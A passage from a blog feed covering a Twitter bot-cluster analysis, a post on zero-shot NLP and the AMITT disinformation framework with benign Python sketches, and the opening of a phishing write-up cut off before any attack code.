        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The Green Community Cluster is not visually distinct from the larger central grouping on the chart, occupying ~30% of it. It is the densest cluster, with the fewest outliers, suggesting that there is less linguistic variation within it. Despite this, the Green Community Cluster was the only cluster in which pro-Boris Johnson tweets (#BackBoris) and tweets supporting the Scottish National Party (and Scottish independence) were observed alongside accounts with more traditionally liberal standpoints. The volume of retweets in this cluster (88%) is high, but it contains notably more original content than the other clusters. It is probable that there was significant ‘bot’ activity in this cluster, although the relatively high median follower count may indicate that there were fewer bots (or possibly a more mature approach to automated amplification).&lt;/p&gt;
&lt;h2&gt;Observations of Amplified Content&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;A behaviour common to many of the accounts appraised was a very high volume of retweets and few original messages. Because of this, it is highly likely that prominent retweets had a stronger effect on how the accounts were clustered than they would have in a dataset with more original content.&lt;/li&gt;
&lt;li&gt;The author of one of the top 10 most amplified tweets was also present in the network. Alastair Campbell’s (&lt;a href=&quot;https://twitter.com/campbellclaret&quot;&gt;@campbellclaret&lt;/a&gt;) account was placed in the Blue cluster, and his most prominent &lt;a href=&quot;https://twitter.com/campbellclaret/status/1516372348953415684&quot;&gt;tweet&lt;/a&gt; during this period was posted on 19 April and shared over 7,000 times.&lt;/li&gt;
&lt;li&gt;In the Pink cluster, 3 of the top 10 most retweeted posts were authored by &lt;a href=&quot;https://twitter.com/Keir_Starmer&quot;&gt;Keir Starmer&lt;/a&gt;. Whilst not conclusive, given the relatively high percentage of retweets in this cluster it is possible that supporters of the Labour leader made an orchestrated attempt at amplification using bots. Further analysis of the accounts in the Pink cluster would be needed to test this hypothesis; it would likely include a temporal study to identify retweeting patterns and a dataset that extends beyond the most recent 200 tweets.&lt;/li&gt;
&lt;li&gt;Interestingly, the average age of the accounts across all the clusters was more than two years, which suggests a fairly mature approach to automated activity, assuming automated activity was prevalent. To achieve this, either aged accounts were purchased or this is a network of accounts that has operated for many years.&lt;/li&gt;
&lt;li&gt;By volume, there were far more tweets suggesting that partygate was still a prominent issue and one that reflected poorly on Boris Johnson, his Government and the Conservative Party. Even in the Green Community Cluster, which contained accounts in favour of Boris Johnson, there was a large quantity of anti-Government tweets.&lt;/li&gt;
&lt;li&gt;Given the lack of original content and the probability of inauthentic and automated ‘bot’ activity, it is difficult to judge whether this is reflective of the UK population as a whole. An unintended output of the analysis may have been the identification of different automated influence campaigns. It is possible that the Pink cluster represents a network of bots promoting Keir Starmer content and highlighting Boris Johnson’s shortcomings with a view to influencing this week’s local elections. The Blue cluster may have been a campaign with broader aims to undermine the Conservative Party. As above, analysis of temporal patterns and a separate dataset would be needed to test these hypotheses.&lt;/li&gt;
&lt;/ul&gt;
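&lt;p&gt;As a rough illustration of the temporal study suggested above, the Python sketch below measures how regular the gaps between each account’s retweets are. It assumes retweet timestamps have already been grouped by account; that data structure and the 0.1 threshold are hypothetical choices, not part of the original analysis. Near-constant intervals can hint at scheduled or automated posting, but as the tip below notes, heuristics like this are far from conclusive on their own.&lt;/p&gt;

```python
from datetime import datetime, timedelta
from statistics import mean, pstdev


def interval_regularity(timestamps):
    """Coefficient of variation of the gaps (in seconds) between retweets.

    Values near 0 mean an account retweets at near-constant intervals.
    Returns None when there are fewer than two gaps to compare.
    """
    ordered = sorted(timestamps)
    gaps = [(later - earlier).total_seconds() for earlier, later in zip(ordered, ordered[1:])]
    if len(gaps) in (0, 1):
        return None
    average = mean(gaps)
    if average == 0:
        return None  # every retweet shares one timestamp, so the ratio is undefined
    return pstdev(gaps) / average


def flag_regular_accounts(retweets_by_account, threshold=0.1):
    """Return accounts whose retweet intervals vary less than `threshold`.

    The threshold is an illustrative assumption, not a validated cut-off.
    """
    flagged = []
    for account, timestamps in retweets_by_account.items():
        score = interval_regularity(timestamps)
        if score is not None and threshold > score:
            flagged.append(account)
    return sorted(flagged)


if __name__ == "__main__":
    start = datetime(2022, 5, 1, 12, 0)
    sample = {
        # Hypothetical accounts: one retweets every minute, one sporadically
        "steady_account": [start + timedelta(minutes=i) for i in range(5)],
        "sporadic_account": [start + timedelta(seconds=s) for s in (0, 10, 310, 340)],
    }
    print(flag_regular_accounts(sample))  # ['steady_account']
```

&lt;p&gt;An account flagged this way is a candidate for manual review rather than evidence of automation; a human who schedules posts would produce the same pattern.&lt;/p&gt;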
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Automatic detection of ‘bot’ activity is actually &lt;a href=&quot;https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3814191&quot;&gt;quite difficult&lt;/a&gt;. Even some published scientific papers studying automated activity and disinformation have struggled to identify useful heuristics for discriminating between human and non-human activity. One of the most common automatic bot detection tools, &lt;a href=&quot;https://botometer.osome.iu.edu/&quot;&gt;Botometer&lt;/a&gt;, has been &lt;a href=&quot;https://blog.plan99.net/fake-science-part-ii-bots-that-are-not-c66129e5e3f5&quot;&gt;increasingly criticised&lt;/a&gt; over the accuracy of its results.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Interpretation&lt;/h2&gt;
&lt;p&gt;Research into suspicious online activity, including suspected influence campaigns, frequently confronts a common problem: many different underlying motivations can manifest as the same behaviour. Inauthentic activity, organic engagement, automated activity and commercial motivations all mix together to drive online behaviour, and definitively distinguishing between these forms of activity is extremely challenging. Classifying the activity often depends on the underlying intent and motivation of the actors involved, which is beyond the reach of research such as this, aimed at describing behaviours on an online platform.&lt;/p&gt;
&lt;h2&gt;Limitations and Caveats&lt;/h2&gt;
&lt;p&gt;As with any methodology, the approach used here has both strengths and weaknesses. When interpreting the data, the following caveats should be borne in mind:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The cluster descriptions are impressionistic. Other researchers may have drawn different contrasts or similarities from an appraisal of accounts in this network, or may have placed emphasis elsewhere.&lt;/li&gt;
&lt;li&gt;The cluster descriptions do not hold true for every account that is a member of them.&lt;/li&gt;
&lt;li&gt;Manual analysis, while the best method for developing holistic impressions, does limit the number of accounts that can be used to characterise clusters.&lt;/li&gt;
&lt;li&gt;Each cluster will contain ‘noise’ of different sorts, including accounts that are from different countries, use different languages and do not behave in the way that the overall descriptions of each cluster would suggest.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Zero-shot learning and the AMITT framework]]></title><description><![CDATA[Problem Statement Can organisations or individuals without nationstate resources assimilate information quickly enough to orchestrate an…]]></description><link>https://dfworks.com/blog/zero_shot_amitt/</link><guid isPermaLink="false">https://dfworks.com/blog/zero_shot_amitt/</guid><pubDate>Wed, 12 May 2021 12:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Problem Statement&lt;/h2&gt;
&lt;p&gt;Can organisations or individuals without nation-state resources assimilate information quickly enough to orchestrate an effective response to combative influence operations?&lt;/p&gt;
&lt;h2&gt;Online Influence Operations&lt;/h2&gt;
&lt;p&gt;Influence operations include both the collection of information about an adversary and the dissemination of propaganda in pursuit of a competitive advantage over an opponent. The exploitation of the openness and reach of the internet by state actors conducting influence operations in pursuit of strategic objectives has been well documented and studied in academia. The history of online influence operations is brief relative to that of more traditional forms of propaganda, but malicious, anonymous and opposing online actors have already used computational propaganda techniques to spread disinformation, censor and attack journalists and create fake trends.&lt;/p&gt;
&lt;p&gt;In the last decade, clear-cut cases of influence operations have been observed in:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://abcnews.go.com/ABC_Univision/ABC_Univision/2012s-biggest-social-media-blunders-latin-american-politics/story?id=18063022&quot;&gt;Argentina&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://independentaustralia.net/politics/politics-display/the-coalitions-twitter-fraud-and-deception,5660&quot;&gt;Australia&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.katypearce.net/cyberfuckery-in-azerbaijan/&quot;&gt;Azerbaijan&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://marcowenjones.wordpress.com/2016/07/12/are-twitter-bots-on-yemen-and-bahrain-hashtags-linked-to-news-broadcaster-saudi-24/&quot;&gt;Bahrain&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.researchgate.net/publication/317335919_Tropical_Bot_Wars&quot;&gt;Brazil&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://gking.harvard.edu/publications/how-censorship-china-allows-government-criticism-silences-collective-expression&quot;&gt;China&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.bbc.co.uk/news/blogs-trending-35778645&quot;&gt;Iran&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://arxiv.org/abs/1509.04098&quot;&gt;Italy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://dl.acm.org/doi/10.1145/2818048.2819985&quot;&gt;Mexico&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.jstor.org/stable/26532695&quot;&gt;Russia&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.nytimes.com/2013/11/22/world/asia/prosecutors-detail-bid-to-sway-south-korean-election.html&quot;&gt;South Korea&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.refworld.org/docid/52663ada8.html&quot;&gt;Saudi Arabia&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.academia.edu/8281464/The_AK_Party_s_social_media_strategy_controlling_the_uncontrollable&quot;&gt;Turkey&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://arxiv.org/ftp/arxiv/papers/1606/1606.06356.pdf&quot;&gt;The UK&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.researchgate.net/publication/280538627_Political_Bots_and_the_Manipulation_of_Public_Opinion_in_Venezuela&quot;&gt;Venezuela&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Often, in order to fully understand the complexity and motives of an online influence operation, an organisation requires both specific domain expertise and large amounts of data. This is achievable when an operation is studied retrospectively, but it is much harder to assimilate information quickly enough to orchestrate a response when you are the target of an active and aggressive influence operation. These issues are more acute for an organisation facing faster-moving smear campaigns or localised influence operations, where nation-state resources and friendly media outlets are unavailable. Situations that may call for an imperfect but faster response include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Trial by media&lt;/strong&gt; - A requirement to impact television and newspaper coverage regarding an individual or organisation’s reputation by seizing a narrative and influencing perceptions of guilt or innocence before a verdict.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Defamation/Libel&lt;/strong&gt; - If your organisation is suffering reputational damage as a result of damaging articles or statements, the offending content often spreads faster than legal proceedings can have it removed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Negative Exposure&lt;/strong&gt; - Negative but accurate media reporting can be combated with counter influence operations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shareholder activism&lt;/strong&gt; - Hedge fund activism designed to exert pressure and leverage boards into making favourable decisions is often supplemented with PR and media activity to seize a narrative and sway neutral voters.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;An organisation that is not typically equipped to handle aggressive influence operations would therefore need to quickly understand the actors involved and the information being disseminated, and to have a framework for forming a response.&lt;/p&gt;
&lt;h2&gt;Quickly assimilating information&lt;/h2&gt;
&lt;p&gt;Zero-Shot Learning (ZSL) is a machine learning method that can detect classes that a model hasn’t observed during training. It resembles our ability as humans to generalise and identify new things without explicit supervision. While ZSL models are unlikely to achieve the accuracy or utility of a model trained specifically for a task, they are well suited to this problem set. Hand-labelled training sets are expensive and time-consuming to assemble and often require domain expertise, none of which is conducive to responding quickly during a crisis.&lt;/p&gt;
&lt;p&gt;Until fairly recently, Natural Language Processing (NLP) models were limited to classifying text into a predefined set of candidate categories. These categories had to be set in advance during training, and adding a new category required retraining the model with more examples. There are excellent open-source NLP models, based on Hugging Face Transformers, that work well for zero-shot text classification, and I have utilised the following in this project:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/AnjanaRita/zeroshot_topics&quot;&gt;zeroshot_topics&lt;/a&gt; is distributed on PyPI as a universal wheel and harnesses &lt;a href=&quot;https://github.com/MaartenGr/KeyBERT&quot;&gt;KeyBERT&lt;/a&gt;, an easy-to-use keyword extraction technique that leverages BERT embeddings to find the keywords and phrases in a document that are most similar to the document itself. The ambition in using this library was to identify themes or clusters of articles/posts deployed in an influence operation.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://pypi.org/project/zero-shot-re/&quot;&gt;zero_shot_re&lt;/a&gt; is a zero-shot relation extractor based on the paper ‘Exploring the zero-shot limit of FewRel’ by &lt;a href=&quot;https://paperswithcode.com/paper/exploring-the-zero-shot-limit-of-fewrel&quot;&gt;Alberto Cetoli&lt;/a&gt;. Being able to generate knowledge graphs from text without domain-specific training data will help identify threat actors and themes.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can follow along with the &lt;a href=&quot;https://github.com/dfaram7/zeroshot_amitt/blob/main/zero_shot_amitt.ipynb&quot;&gt;notebook&lt;/a&gt; on GitHub.&lt;/p&gt;
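&lt;p&gt;To make the idea of classifying against labels that were never seen in training more concrete, the sketch below shows the entailment-based approach used by zero-shot text classifiers such as the Hugging Face zero-shot-classification pipeline: each candidate label is turned into a hypothesis sentence, a natural language inference (NLI) model scores how strongly the text entails it, and the scores are normalised across labels. The scoring function here is a deliberately crude word-overlap stand-in (a hypothetical placeholder, not an NLI model), and the hypothesis template is an assumption for illustration.&lt;/p&gt;

```python
import math
import re


def zero_shot_classify(text, candidate_labels, entailment_score,
                       template="This text is about {}."):
    """Rank labels by how strongly `text` entails a hypothesis built from each one.

    `entailment_score(premise, hypothesis)` should return a logit; in practice
    it would come from an NLI model. Scores are softmax-normalised across labels.
    """
    hypotheses = [template.format(label) for label in candidate_labels]
    logits = [entailment_score(text, hypothesis) for hypothesis in hypotheses]
    peak = max(logits)  # subtract the maximum for numerical stability
    weights = [math.exp(logit - peak) for logit in logits]
    total = sum(weights)
    ranked = [(label, weight / total) for label, weight in zip(candidate_labels, weights)]
    return sorted(ranked, key=lambda pair: pair[1], reverse=True)


def word_overlap_score(premise, hypothesis):
    """Hypothetical stand-in for an NLI model: count shared lowercase words."""
    premise_words = set(re.findall(r"[a-z]+", premise.lower()))
    hypothesis_words = set(re.findall(r"[a-z]+", hypothesis.lower()))
    return float(len(premise_words.intersection(hypothesis_words)))


if __name__ == "__main__":
    article = "The election result was disputed by the opposition party."
    labels = ["election", "sport", "weather"]  # new labels need no retraining
    for label, score in zero_shot_classify(article, labels, word_overlap_score):
        print(f"{label}: {score:.2f}")
```

&lt;p&gt;With a real NLI model in place of word_overlap_score the structure stays the same: the label set is supplied at inference time rather than fixed during training, which is what allows new themes to be tested as an operation unfolds.&lt;/p&gt;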
&lt;h2&gt;A framework for responding to online influence operations&lt;/h2&gt;
&lt;p&gt;The Adversarial Misinformation and Influence Tactics and Techniques (&lt;a href=&quot;https://github.com/cogsec-collaborative/AMITT&quot;&gt;AMITT&lt;/a&gt;) Framework was created out of a need for a common language for disinformation. The structure and propagation patterns of misinformation attacks have many similarities to those seen in information security and computer hacking, so the framework adopts a structure similar to that of the &lt;a href=&quot;https://attack.mitre.org/&quot;&gt;MITRE&lt;/a&gt; ATT&amp;#x26;CK framework, which has been widely adopted in the cyber security industry.&lt;/p&gt;
&lt;p&gt;AMITT is a set of data standards and an open source knowledge base of both red and blue team disinformation tactics and techniques. AMITT’s intended users are disinformation responders; its purpose is to give them the ability to tactically respond to influence operations, plan defences and to transfer information security principles to the disinformation sphere. The framework consists of blue team (defence) and red team (attack) models as well as a repository of examples, descriptions and mitigations.&lt;/p&gt;
&lt;h2&gt;Project&lt;/h2&gt;
&lt;p&gt;We have used Neo4j, a graph database that implements the labeled property graph model, to store and present the information extracted from each article. Each scraped article has a sentiment, a theme/topic classified by ZSL and a series of extracted entities.&lt;/p&gt;
&lt;p&gt;Relations between entities are stored as intermediate nodes instead of direct links, which makes it easier to display sentiment and provides an audit trail back to the source text from which each relation was extracted. In the labeled property graph model a relationship can’t point to another relationship, so we refactor each connection between extracted entities into an intermediate node. Feel free to try topics and search terms of your own.&lt;/p&gt;
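&lt;p&gt;The refactoring described above can be sketched in plain Python before any data reaches Neo4j. Each extracted relation becomes its own node carrying the relation type, sentiment and source sentence, linked to its subject and object entities; in Cypher terms this corresponds to a pattern like (:Entity)-[:SUBJECT_OF]-&gt;(:Relation)-[:HAS_OBJECT]-&gt;(:Entity). The node labels, relationship types and property names here are hypothetical, not necessarily those used in the notebook.&lt;/p&gt;

```python
from dataclasses import dataclass, field


@dataclass
class PropertyGraph:
    """Minimal stand-in for a labeled property graph."""
    nodes: dict = field(default_factory=dict)  # node key -> properties
    edges: list = field(default_factory=list)  # (from key, relationship type, to key)


def add_relation(graph, subject, relation, obj, sentiment, source_text):
    """Store one extracted (subject, relation, object) triple via an intermediate node."""
    subject_key, object_key = ("Entity", subject), ("Entity", obj)
    # Entity nodes are shared, so repeated mentions resolve to the same node
    graph.nodes.setdefault(subject_key, {"name": subject})
    graph.nodes.setdefault(object_key, {"name": obj})
    # The relation itself is a node, so it can hold sentiment and an audit trail
    relation_key = ("Relation", len(graph.nodes))
    graph.nodes[relation_key] = {
        "type": relation,
        "sentiment": sentiment,
        "source_text": source_text,
    }
    graph.edges.append((subject_key, "SUBJECT_OF", relation_key))
    graph.edges.append((relation_key, "HAS_OBJECT", object_key))
    return relation_key


if __name__ == "__main__":
    graph = PropertyGraph()
    # Hypothetical triples extracted from two sentences
    add_relation(graph, "Person A", "linked", "Company B", -0.6, "Person A is linked to Company B.")
    add_relation(graph, "Person A", "associates", "Person C", 0.1, "Person A associates with Person C.")
    print(len(graph.nodes), len(graph.edges))  # 5 4
```

&lt;p&gt;Because the relation is a node, further context such as the article it came from can later be attached with an ordinary relationship, which is not possible when the relation is stored as a direct link.&lt;/p&gt;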
&lt;h2&gt;Overlaying AMITT framework and further work&lt;/h2&gt;
&lt;p&gt;There will still be elements of manual analysis required to understand the context of a given influence operation, but the graph data could, for example, be used to help determine the following more quickly:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Discovery of frequently discussed topics can help to determine opponent &lt;a href=&quot;https://github.com/cogsec-collaborative/AMITT/blob/main/tactics/TA01.md&quot;&gt;strategic objectives&lt;/a&gt; (dismiss, distort, distract, dismay, divide) as well as existing and competing narratives.&lt;/li&gt;
&lt;li&gt;Analysis of the entire network can help inform a &lt;a href=&quot;https://github.com/cogsec-collaborative/AMITT/blob/main/techniques/T0005.md&quot;&gt;centre of gravity&lt;/a&gt; study where key communities, influencers and media outlets can be identified.&lt;/li&gt;
&lt;li&gt;Replacing media articles with tweets or other social media posts and incorporating bot or “fake news” detection will help build a picture of where and how computational propaganda is being used.&lt;/li&gt;
&lt;li&gt;Identification of friendly &lt;a href=&quot;https://github.com/cogsec-collaborative/AMITT/blob/main/techniques/T0039.md&quot;&gt;influencers&lt;/a&gt; who may also be targeted.&lt;/li&gt;
&lt;li&gt;Identification of fault lines between communities can help develop counter narratives that are &lt;a href=&quot;https://github.com/cogsec-collaborative/AMITT/blob/main/counters/C00111.md&quot;&gt;sympathetic&lt;/a&gt; to opposing forces.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Issues and Hints&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Neo4j Browser can only display a limited number of nodes and relationships at once. Filtering nodes by a minimum number of relationships will help surface useful information.&lt;/li&gt;
&lt;li&gt;The codebase performs coreference resolution and pairs mathematically similar words and phrases, but there will still be cases where a single entity has multiple nodes (James, Jim, Jimmy, James Johnson), and manual correction may be required.&lt;/li&gt;
&lt;li&gt;Occasionally, where a website renders an error page or something else unusual, the program will process that text and include it as nodes, which will then need to be removed.&lt;/li&gt;
&lt;li&gt;The more obscure the relationship you try to extract, the less successful your project will be. I have had success using “linked”, “associates” and “interacts”, but more complex relationships like “shareholder” or “beneficial owner” are less successful.&lt;/li&gt;
&lt;/ul&gt;
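&lt;p&gt;The first two hints can be partially automated before loading data into Neo4j. The Python sketch below works on a plain list of entity pairs rather than the notebook’s actual data model. It merges a short name into a longer one when all of its words appear in exactly one longer name (so “James” folds into “James Johnson”), then keeps only nodes with at least a minimum number of connections; the default of 3 mirrors the “more than 2 connections” filter used in the Gambia example below. Nicknames such as “Jim” or “Jimmy” are deliberately left alone and still need manual correction. The merging rule and threshold are assumptions for illustration.&lt;/p&gt;

```python
from collections import Counter


def build_alias_map(names):
    """Map each name to the one longer name containing all of its words, if exactly one exists."""
    multi_word = [name for name in names if len(name.split()) > 1]
    alias_map = {}
    for name in names:
        words = set(name.lower().split())
        containers = [
            other for other in multi_word
            if other != name and words.issubset(other.lower().split())
        ]
        # Ambiguous short names (contained in several longer names) stay unmerged
        alias_map[name] = containers[0] if len(containers) == 1 else name
    return alias_map


def clean_edges(edges, min_degree=3):
    """Merge aliases, drop self-loops, then keep edges between well-connected nodes."""
    names = list(dict.fromkeys(name for edge in edges for name in edge))
    alias_map = build_alias_map(names)
    merged = []
    for a, b in edges:
        a, b = alias_map[a], alias_map[b]
        if a != b:
            merged.append((a, b))
    degree = Counter()
    for a, b in merged:
        degree[a] += 1
        degree[b] += 1
    keep = {name for name, count in degree.items() if count >= min_degree}
    return [(a, b) for a, b in merged if a in keep and b in keep]


if __name__ == "__main__":
    # Hypothetical entity pairs extracted from articles
    pairs = [
        ("James", "Party A"),
        ("James Johnson", "Party B"),
        ("James Johnson", "Newspaper X"),
        ("Jim", "Party A"),
        ("Party A", "Party B"),
    ]
    print(clean_edges(pairs))  # [('James Johnson', 'Party A')]
```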
&lt;h2&gt;Example&lt;/h2&gt;
&lt;p&gt;The recent 2021 Gambia election wasn’t a subject that I was particularly knowledgeable about, but the underlying graph data for the chart below was scraped and analysed from 25 news articles in less than half an hour. The chart shows nodes with more than 2 connections, and the annotations were added manually. Whilst not groundbreaking, the chart hopefully demonstrates what could be done with more data supplemented by manual analysis.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/8cd75889fa399ba00a54ccbe7be8ecd5/095fc/gambian_election.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 122.2972972972973%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAYABQDASIAAhEBAxEB/8QAGAABAQEBAQAAAAAAAAAAAAAAAAMCBAX/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAAB97mvKLMFpksyD//EABoQAAMAAwEAAAAAAAAAAAAAAAABERASISL/2gAIAQEAAQUCbht7TIiduGNH/8QAFxEBAQEBAAAAAAAAAAAAAAAAEQABEP/aAAgBAwEBPwEY3hf/xAAWEQADAAAAAAAAAAAAAAAAAAAAEBH/2gAIAQIBAT8BdP/EABQQAQAAAAAAAAAAAAAAAAAAADD/2gAIAQEABj8CH//EABgQAAMBAQAAAAAAAAAAAAAAAAABETEh/9oACAEBAAE/IUCNoqshbXWOGORKUgu9P//aAAwDAQACAAMAAAAQiO89/8QAFxEBAQEBAAAAAAAAAAAAAAAAAQAQEf/aAAgBAwEBPxAUMub/xAAXEQADAQAAAAAAAAAAAAAAAAAAAREQ/9oACAECAQE/EGXKP//EAB4QAQEAAgICAwAAAAAAAAAAAAERACExQVFhgbHB/9oACAEBAAE/EAK11dYvSEdI41nkSOaJIIt9T9wTsI07+XLIaSaYv0ZQvLgo0U5O5cG98eM//9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Gambia Election&quot;
        title=&quot;Gambia Election&quot;
        src=&quot;/static/8cd75889fa399ba00a54ccbe7be8ecd5/1c72d/gambian_election.jpg&quot;
        srcset=&quot;/static/8cd75889fa399ba00a54ccbe7be8ecd5/a80bd/gambian_election.jpg 148w,
/static/8cd75889fa399ba00a54ccbe7be8ecd5/1c91a/gambian_election.jpg 295w,
/static/8cd75889fa399ba00a54ccbe7be8ecd5/1c72d/gambian_election.jpg 590w,
/static/8cd75889fa399ba00a54ccbe7be8ecd5/a8a14/gambian_election.jpg 885w,
/static/8cd75889fa399ba00a54ccbe7be8ecd5/095fc/gambian_election.jpg 1134w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Examination of a self-contained credential stealer]]></title><description><![CDATA[Phishing e-mails which are designed to steal credentials often depend on a user clicking a malicious link. The link then usually navigates…]]></description><link>https://dfworks.com/blog/credential_stealer/</link><guid isPermaLink="false">https://dfworks.com/blog/credential_stealer/</guid><pubDate>Sun, 03 May 2020 12:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Phishing e-mails which are designed to steal credentials often depend on a user clicking a malicious link. The link then usually navigates to a website that mimics a login page for a valid service or web application. A phishing email that I received this week took a slightly different approach as the credential theft occurred in a self-contained html file rather than using a remote website.&lt;/p&gt;
&lt;p&gt;This attack methodology isn’t new, but alongside some other obfuscation tactics I thought it warranted a write-up so that other organisations and internet users can be better prepared to identify a similar attack.&lt;/p&gt;
&lt;h2&gt;The email&lt;/h2&gt;
&lt;p&gt;The email we received had no body, only an HTML attachment posing as an Excel document…&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;csriskmanagement-997072_xls.html&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;…and the subject line&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Overdué invoicé - TransPérfect - Invoicé&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/8c45dd4b21e3cb60913a18a4dc232ef1/6a068/email.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 41.21621621621622%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAIABQDASIAAhEBAxEB/8QAFgABAQEAAAAAAAAAAAAAAAAAAAEF/8QAFAEBAAAAAAAAAAAAAAAAAAAAAP/aAAwDAQACEAMQAAAB26AH/8QAFxAAAwEAAAAAAAAAAAAAAAAAAAERIf/aAAgBAQABBQLCoqP/xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAEDAQE/AT//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAECAQE/AT//xAAWEAEBAQAAAAAAAAAAAAAAAAAAMQH/2gAIAQEABj8CuKr/xAAYEAADAQEAAAAAAAAAAAAAAAAAIWEBkf/aAAgBAQABPyHEZRdIj//aAAwDAQACAAMAAAAQc8//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAEDAQE/ED//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAECAQE/ED//xAAXEAEBAQEAAAAAAAAAAAAAAAABAPFR/9oACAEBAAE/EGAM6iWKtcv/2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Email&quot;
        title=&quot;Email&quot;
        src=&quot;/static/8c45dd4b21e3cb60913a18a4dc232ef1/1c72d/email.jpg&quot;
        srcset=&quot;/static/8c45dd4b21e3cb60913a18a4dc232ef1/a80bd/email.jpg 148w,
/static/8c45dd4b21e3cb60913a18a4dc232ef1/1c91a/email.jpg 295w,
